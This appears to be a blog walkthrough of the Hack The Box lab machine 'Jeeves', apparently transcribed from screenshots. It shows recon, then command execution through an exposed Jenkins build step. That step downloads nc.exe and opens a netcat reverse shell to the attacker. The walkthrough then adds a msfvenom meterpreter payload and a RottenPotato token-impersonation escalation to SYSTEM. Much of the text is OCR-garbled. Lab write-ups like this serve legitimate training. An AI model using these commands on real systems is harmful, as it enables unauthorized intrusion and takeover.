HTB – Jeeves Walkthrough

nmap

PORT 
80/tcp 
STATE SERVICE 
open http 
VERSION 
Microsoft IIS httpd 10.0 
I http-methods: 
Supported methods: OPTIONS TRACE GET HEAD POST 
Potentially risky methods: TRACE 
I http-server-header: Microsoft-IIS/ 10.0 
I http-title: Ask Jeeves 
135/tcp 
open msrpc 
Microsoft Windows RPC 
open microsoft-ds Microsoft Windows 7 
10 microsoft-ds (workgroup: 
445/tcp 
WORKGROUP) 
50000/tcp open http 
Jetty 9.4. z-SNAPSHOT 
I http-server-header: Jetty (9.4. z-SNAPSHOT) 
I http-title: Error 404 Not Found 
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows 
Host script results: 
I smb2-security-mode: 
2.10: 
message signing enabled but not required 
I smb2-time: Protocol negotiation failed (SP182)

gobuster

root@kali: /home/kalisa/HTB/jeeves 158x43 
gobuster -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
OJ Reeves (@TheColonial) 
Gobuster v2.O.1 
mode 
Url/Domain 
Threads 
Wordlist 
Status codes 
Timeout 
. dir 
http://10.10.10.63:50000/ 
10 
/usr/share/wordlists/dirbuster/directory-list-2.3-medium . txt 
, 403 
IOS 
2019/07/07 starting gobuster 
/askjeeves (Status: 302) 
Progress: 117951 / 220561 (53.48%)

Jenkins 

Code Execution

Create a project on Jenkins

(9 0.10.14.4443 >/tmp/f + 
Jenkins 
All 
10.10.10.63:50000/askjeeves/view/all/newJ0b 
Enter an item name 
kalisa 
Required field 
Freestyle project 
Ill \ 
This is the central feature of Jenkins. Jenkins will build your project, combining any SCM with any build system, and this can be even used for 
something other than software build. 
Pipeline 
Orchestrates long-running activities that can span multiple build slaves. Suitable for building pipelines (formerly known as workflows) and/or 
organizing complex activities that do not easily fit in free-style jab type. 
Multi-configuration project 
Suitable for prpjects that need a large number of different configurations, such as testing on multiple environments, platform-specific builds, etc. 
Folder 
Creates a container that stores nested items in it. Useful for grouping things together. Unlike view, which is just a filter, a folder creates a 
separate namespace, so you can have multiple things of the same name as long as they are in different folders. 
GitHub Organization 
Scans a GitHub organization (or user account) for all repositories matching some defined markers. 
Multibranch Pipeline 
Creates a set of Pipeline prpjects according to detected branches in one SCM repository. 
OK

Low Privileged Shell

Enter commands under Build Section

Powershell wget “http://10.10.14.4:8000/nc.exe” -outfile “nc.exe”

Nc.exe 10.10.14.4 7777 -e cmd.exe

Build 
Execute Windows batch command 
Command "http://10.10.14.13:8000/nc.exe 
nc.exe 10.10.14.13 7777 -e cmd.exe 
See the list of available environment variables 
Add build step 
Post-build Actions 
" -out file 
"nc.exe" 
Advanced.- 
Save 
Apply

And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell

python -m SimpleHTTPServer 
serving HTTP on O.O.O.O port 8000 
10.10.10.63 
[07/Ju1/2019 "GET /nc.exe HTTP/I.I" 200 
root@kali: /home/kalisa/HTB/jeeves 158x26 
nc -nlvp 7777 
listening on [any] 7777 
connect to [10.10. 14.13] from (UNKNOWN) [10.10. 10.63] 49677 
Microsoft Windows [Version 10.0. 10586] 
(c) 2015 Microsoft Corporation. All rights reserved. 
C : rx . j enkins\wo

Meterpreter Shell

Create a shell with the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Upload the executable file as shell.exe

Build 
Execute Windows batch command 
Command "http://10.10.14.13:8000/shell.exe 
" -out file 
"shell.exe" 
Advanced.- 
Save 
shell.exe 
See the list of available environment variables 
Apply

And listen on metasploit

root@kati : /home/katisa/HTB/ j eeves# 
metasploit v5.O.29-dev 
msfconsole 
1899 exploits 
1068 auxiliary 
547 payloads - 44 encoders 
10 
2 evasion 
[ Starting persistent handler(s)... 
msf5 > use exploit/ multi/ handler 
msf5 exploit (multi/handter) > set payload 
329 
nops 
post 
windows/ meterpreter/reverse tcp 
payload => windows/ meterpreter/reverse tcp 
msf5 exploit (multi/handter) > set LHOST 10.10. 14.13 
LHOST 10.10. 14.13 
msf5 exploit (multi/handter) > set LPORT 8888 
LPORT 8888 
msf5 exploit (multi/handter) > run 
[ Started reverse TCP handler on 10.10.14.13:8888 
sending stage (179779 bytes) to 10.10. 10.63 
meterpreter session 1 opened (10.10.14.13:8888 10.10.10.63:49679) at 2019-07-07 
meterpreter > 
-0400

Privilege Escalation

I checked with whoami/priv command and saw that SeImpersonatePrivilege is enabled

whoami / priv 
PRIVILEGES INFORMATION 
Privilege Name 
SeShutdownPrivilege 
SeChangeNotifyPrivilege 
SeUndockPrivilege 
Selmpersonateprivilege 
SecreateGlobalPrivilege 
SelncreaseWorkingSetPrivilege 
SeTimeZonePrivilege 
/ priv 
Description 
Shut down the system 
Bypass traverse checking 
Remove computer from docking station 
Impersonate a client after authentication 
Create global objects 
Increase a process working set 
Change the time zone 
State 
Disabled 
Enabled 
Disabled 
Enabled 
Enabled 
Disabled 
Disabled

I first loaded incognito with the command load incognito on meterpreter

list tokens and you’ll see no token available.

Upload rottenpotato.exe and execute the file 

meter preter > list tokens 
-g 
[-] Warning: Not currently 
running as SYSTEM, not all tokens will be available 
Call rev2self 
if primary process token is SYSTEM 
Delegation Tokens Available 
BUILTIN\Users 
NT AUTHORITY\Authenticated Users 
NT AUTHORITY\Loca1 account 
NT AUTHORITY\LogonSession1d 0 116102 
NT AUTHORITY\NTLM Authentication 
NT AUTHORITY\SERVICE 
NT AUTHORITY\This organization 
Impersonation Tokens Available 
No tokens available 
meter preter > execute 
Process 3536 created. 
Channel 3 created. 
-f rot. exe

list tokens again and you’ll see administrator token now

meter preter > list tokens 
-g 
[-] Warning: Not currently 
running as SYSTEM, not all tokens will be available 
Call rev2self 
if primary process token is SYSTEM 
Delegation Tokens Available 
BUILTIN\Users 
NT AUTHORITY\Authenticated Users 
NT AUTHORITY\Loca1 account 
NT AUTHORITY\LogonSession1d 0 116102 
NT AUTHORITY\NTLM Authentication 
NT AUTHORITY\SERVICE 
NT AUTHORITY\This organization 
Impersonation Tokens Available 
BUILTIN\Administrators 
NT AUTHORITY\LogonSession1d 0 82652 
NT 
SERVICE\BITS 
NT 
SERVICE\DsmSvc 
SERVICE-\iphlpsvc 
NT 
NT 
SERVICE-Uanmanserver 
SERVICE-Ufsvc 
NT 
SERVICE\Schedu1e 
NT 
NT 
SERVICE-NSE-NS 
SERVICE\She11HWDetection 
NT 
SERVICE\Winmgmt 
NT 
NT 
SERVICE-\wuauserv

Now impersonate the token and become NT AUTHORITY\SYSTEM

meterpreter > impersonate token "BUILTIN\Administrators" 
[-] Warning: Not currently running as SYSTEM, not all tokens will be available 
Call rev2self if primary process token is SYSTEM 
[-] No delegation token available 
[+] Successfully impersonated user NT AUTHORITY\SYSTEPI 
meter preter > getuid 
server username: NT AUTHORITY\SYSTEM 
meterpreter >

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.